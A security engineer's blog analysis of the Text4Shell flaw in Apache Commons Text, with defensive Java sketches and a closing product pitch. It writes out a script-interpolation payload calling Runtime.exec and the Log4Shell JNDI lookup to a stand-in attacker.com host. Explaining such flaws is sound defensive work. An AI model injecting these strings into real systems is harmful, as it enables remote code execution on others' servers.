Vulnerability Analysis

Text4Shell (CVE-2022-42889): Apache Commons Text and the Haunting Echo of Log4Shell

A critical RCE vulnerability in Apache Commons Text drew immediate comparisons to Log4Shell. While less severe in practice, it highlighted how deeply embedded utility libraries create systemic risk.

Nayan Dey
Security Engineer

When security researcher Alvaro Munoz disclosed CVE-2022-42889 in October 2022, the security community immediately reached for the comparison that had dominated every vulnerability discussion since December 2021: "Is this the next Log4Shell?" The vulnerability, quickly dubbed "Text4Shell," affected Apache Commons Text, a widely used Java library for string manipulation. Like Log4j, Apache Commons Text is a foundational utility library embedded in countless applications. Like Log4Shell, Text4Shell allowed remote code execution through string interpolation. But the story of Text4Shell is less about the vulnerability itself and more about what it reveals about how the software industry handles library-level risk.

The Technical Details

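Apache Commons Text provides a StringSubstitutor class that performs variable interpolation on strings. When the class is set up with the library's default interpolators (for example, via StringSubstitutor.createInterpolator()), affected versions recognize several lookup prefixes, including dns:, url:, and, critically, script:. The script: prefix hands its argument to a script engine through the Java scripting API (javax.script), which can execute arbitrary code.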

If an application passes untrusted input through StringSubstitutor.replace() or related methods without sanitization, an attacker can inject a payload like:

${script:javascript:java.lang.Runtime.getRuntime().exec('malicious command')}

This is conceptually similar to Log4Shell's ${jndi:ldap://attacker.com/exploit} pattern. Both vulnerabilities exploit string interpolation features that process embedded expressions in ways that developers don't anticipate.
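To make the mechanism concrete, here is a toy model of prefix-based interpolation. It is a sketch for illustration only and is not the Commons Text implementation: the ToyInterpolator class, its register method, and the upper: prefix are all hypothetical, and the stand-in script lookup only reports what it would run instead of executing anything.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Toy model of prefix-based interpolation; NOT the Commons Text implementation. */
final class ToyInterpolator {
    // Matches ${prefix:argument}. Nested expressions are out of scope for this sketch.
    private static final Pattern EXPR = Pattern.compile("\\$\\{([a-zA-Z]+):([^}]*)\\}");

    private final Map<String, Function<String, String>> lookups = new LinkedHashMap<>();

    /** Registers a lookup that handles expressions starting with the given prefix. */
    ToyInterpolator register(String prefix, Function<String, String> lookup) {
        lookups.put(prefix, lookup);
        return this;
    }

    /** Replaces every ${prefix:argument} whose prefix has a registered lookup. */
    String replace(String template) {
        Matcher m = EXPR.matcher(template);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            Function<String, String> lookup = lookups.get(m.group(1));
            // Unknown prefixes are left untouched; known ones are dispatched.
            String value = lookup == null ? m.group() : lookup.apply(m.group(2));
            m.appendReplacement(out, Matcher.quoteReplacement(value));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        ToyInterpolator safe = new ToyInterpolator()
                .register("upper", String::toUpperCase);
        ToyInterpolator risky = new ToyInterpolator()
                .register("upper", String::toUpperCase)
                // Stand-in for a script lookup: it only reports what it WOULD run.
                .register("script", code -> "[would execute: " + code + "]");

        String attackerInput = "hello ${script:javascript:1+1}";
        System.out.println(safe.replace(attackerInput));
        System.out.println(risky.replace(attackerInput));
    }
}
```

The point of the sketch is that the same attacker-supplied string is inert in one configuration and reaches a code-executing lookup in the other. Which lookups are registered by default decides whether untrusted input is dangerous.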

The vulnerability affected Apache Commons Text versions 1.5 through 1.9. The fix in version 1.10.0 disabled the script, dns, and url interpolators by default, requiring explicit opt-in for these dangerous features.
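The affected range can be expressed as a small check. This is a minimal sketch: the class and method names are hypothetical, and it assumes plain dotted version strings such as "1.9" or "1.10.0".

```java
/** Sketch of a version-range check for CVE-2022-42889 (names are illustrative). */
final class CommonsTextVersionCheck {

    /** Returns true for releases 1.5 through 1.9; 1.10.0 and later carry the fix. */
    static boolean isAffected(String version) {
        int[] v = parseMajorMinor(version);
        // Affected range: 1.5 <= version < 1.10
        return v[0] == 1 && v[1] >= 5 && v[1] < 10;
    }

    private static int[] parseMajorMinor(String version) {
        String[] parts = version.trim().split("\\.");
        int[] out = new int[2];
        for (int i = 0; i < 2 && i < parts.length; i++) {
            // Keep only the leading digits, so "9-SNAPSHOT" parses as 9.
            String digits = parts[i].replaceFirst("\\D.*$", "");
            out[i] = digits.isEmpty() ? 0 : Integer.parseInt(digits);
        }
        return out;
    }

    public static void main(String[] args) {
        for (String v : new String[] {"1.4", "1.5", "1.9", "1.10.0"}) {
            System.out.println(v + " affected: " + isAffected(v));
        }
    }
}
```

The components are compared as numbers on purpose. A plain string comparison would sort "1.10.0" before "1.9" and misclassify the fixed release as vulnerable.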

Why It Wasn't Quite Log4Shell

Despite the surface similarities, Text4Shell had a meaningfully smaller blast radius than Log4Shell for several reasons.

Usage patterns differ. Log4j processes virtually all string data that flows through a Java application because logging is ubiquitous. Apache Commons Text's StringSubstitutor is used in more targeted scenarios. Not every application using Commons Text actually calls the vulnerable interpolation methods, and fewer still pass untrusted input to them.

The attack surface is narrower. Log4Shell could be triggered through HTTP headers, URL parameters, form fields, or any data that eventually reached a log statement. Text4Shell requires that attacker-controlled input specifically reaches a StringSubstitutor call, which is a more constrained attack path.

Detection was faster. The security community was primed after Log4Shell. Within hours of disclosure, major vulnerability scanners had detection signatures. Organizations that had built Log4Shell response playbooks could adapt them quickly.

That said, dismissing Text4Shell as a non-issue would be a mistake. The CVSS score of 9.8 reflected real risk for applications that did pass untrusted input through string interpolation. Several proof-of-concept exploits demonstrated reliable remote code execution in vulnerable configurations.

The Deeper Problem: Invisible Dependencies

Text4Shell's real lesson isn't about one CVE. It's about the systemic risk created by utility libraries that sit deep in dependency trees. Apache Commons Text had over 2,500 direct dependents on Maven Central at the time of disclosure. Each of those dependents had its own dependents, creating a transitive dependency chain that's nearly impossible to trace manually.

Consider a typical enterprise Java application. It might not directly depend on Apache Commons Text at all. But it probably depends on a framework that depends on a library that depends on Commons Text. When CVE-2022-42889 dropped, many development teams had to answer a question they'd never considered: "Do we even use Apache Commons Text?"

This is the same dynamic that made Log4Shell so chaotic. Organizations spent weeks inventorying their applications because they had no reliable way to determine which applications included the vulnerable library. Many discovered Log4j in places they never expected: embedded firmware, SaaS products, internal tools built years ago by developers who had long since left.

Text4Shell replayed this inventory challenge. Teams that had built SBOM (Software Bill of Materials) practices after Log4Shell found they could answer the question in minutes. Teams that hadn't were back to manual dependency tree analysis, grep searches through build files, and hope.
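For teams without an SBOM, one fallback is to scan the text output of mvn dependency:tree, which prints coordinates as groupId:artifactId:type:version:scope. The sketch below assumes that layout (coordinates with a classifier are not handled), and the com.example artifacts in the sample are hypothetical.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Sketch: find affected Commons Text versions in `mvn dependency:tree` output. */
final class DependencyTreeScan {
    // groupId:artifactId:type:version, capturing the major and minor version numbers.
    private static final Pattern COMMONS_TEXT = Pattern.compile(
            "org\\.apache\\.commons:commons-text:[^:\\s]+:(\\d+)\\.(\\d+)");

    /** Returns the tree lines that pull in Commons Text 1.5 through 1.9. */
    static List<String> findAffected(List<String> treeLines) {
        List<String> hits = new ArrayList<>();
        for (String line : treeLines) {
            Matcher m = COMMONS_TEXT.matcher(line);
            if (!m.find()) {
                continue;
            }
            int major = Integer.parseInt(m.group(1));
            int minor = Integer.parseInt(m.group(2));
            if (major == 1 && minor >= 5 && minor < 10) {
                hits.add(line.trim());
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Hypothetical tree: the app never declares Commons Text directly.
        List<String> sample = List.of(
                "[INFO] com.example:demo-app:jar:1.0.0",
                "[INFO] +- com.example:some-framework:jar:2.3.1:compile",
                "[INFO] |  \\- org.apache.commons:commons-text:jar:1.9:compile",
                "[INFO] \\- org.apache.commons:commons-lang3:jar:3.12.0:compile");
        findAffected(sample).forEach(System.out::println);
    }
}
```

A scan like this only covers projects you can build and only at the moment you run it, which is the gap a maintained SBOM closes.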

The Industry Response

The response to Text4Shell was notably more measured than the Log4Shell panic. This was partly because the vulnerability was harder to exploit in practice, but also because organizations had improved their vulnerability response capabilities.

Major cloud providers scanned their managed services and pushed updates within days. Container image scanners added detection quickly. CISA issued an advisory but didn't declare the kind of emergency response that Log4Shell warranted.

However, the response also revealed persistent gaps. Many organizations still couldn't quickly determine whether they were affected. Internal tooling and legacy applications remained blind spots. And the long tail of patching, as always, extended for months.

Exploitation in the Wild

Unlike Log4Shell, which saw mass exploitation within hours, Text4Shell saw more targeted exploitation. Security firms observed scanning activity probing for vulnerable endpoints within days of disclosure, but widespread exploitation didn't materialize at the same scale.

This doesn't mean the vulnerability was benign. Targeted exploitation is harder to detect and often more damaging than mass scanning. Sophisticated threat actors who identified vulnerable applications could achieve reliable code execution with minimal noise.

Honeypot data from several security research firms showed a steady trickle of exploitation attempts throughout late 2022, with payloads ranging from simple reverse shells to more complex staged attacks. The lower volume compared to Log4Shell likely reflects the narrower attack surface rather than a lack of attacker interest.

Patching and Remediation

Apache released version 1.10.0 of Commons Text, which disabled the dangerous interpolators by default. The fix was straightforward, but deployment followed the usual pattern: rapid adoption by actively maintained projects, slow or nonexistent updates for legacy and abandoned software.

For organizations that couldn't immediately update, the mitigation was to ensure that no untrusted input reached StringSubstitutor methods. This required code auditing to identify all call sites, a process that ranged from trivial in small applications to impractical in large codebases without proper tooling.
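As a stopgap at call sites that cannot be upgraded yet, untrusted values can be screened before they reach interpolation. The following is a minimal sketch with hypothetical names. It assumes the default "${" variable prefix is in use and conservatively rejects any input containing it, so it is no substitute for moving to 1.10.0.

```java
/** Sketch of a conservative input screen (names are illustrative). */
final class InterpolationGuard {

    /**
     * Returns the value unchanged, or throws if it contains the default
     * variable prefix "${". Custom prefixes are NOT covered by this check.
     */
    static String requireNoInterpolation(String untrusted) {
        if (untrusted != null && untrusted.contains("${")) {
            throw new IllegalArgumentException(
                    "interpolation syntax is not allowed in user input");
        }
        return untrusted;
    }

    public static void main(String[] args) {
        System.out.println(requireNoInterpolation("plain user text"));
        try {
            requireNoInterpolation("${script:javascript:1+1}");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Rejecting every "${" is blunter than matching only script:, dns:, and url:, but it avoids guessing which prefixes a given configuration accepts. Where the code only needs to fill in known values, constructing StringSubstitutor from a plain Map of those values, rather than with the default interpolators, is likely the cleaner fix.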

What Should Have Been Different

Text4Shell was a case where SBOM practices would have immediately shortened the response cycle. If every application maintained an accurate, up-to-date SBOM, determining exposure would take seconds instead of days. The technology for this has existed for years. The adoption has been painfully slow.

Additionally, the pattern of "dangerous defaults in utility libraries" should have been addressed more aggressively after Log4Shell. Library maintainers should default to the safest configuration and require explicit opt-in for features that can execute arbitrary code. The Apache Commons Text team's fix, disabling dangerous interpolators by default, is exactly the right approach, but it should have been the default from the start.

How Safeguard.sh Helps

Safeguard.sh's SBOM generation and continuous dependency monitoring directly address the inventory problem that Text4Shell exposed. When a new CVE drops against a transitive dependency buried three levels deep in your dependency tree, Safeguard.sh tells you immediately which of your applications are affected. No manual grep searches, no guessing.

The platform's vulnerability scanning catches known CVEs in your dependency chain before they become incidents. Policy gates can enforce minimum library versions and block builds that include known-vulnerable dependencies. For a vulnerability like Text4Shell, this means your CI/CD pipeline catches the risk at build time rather than after a security advisory sends your team scrambling.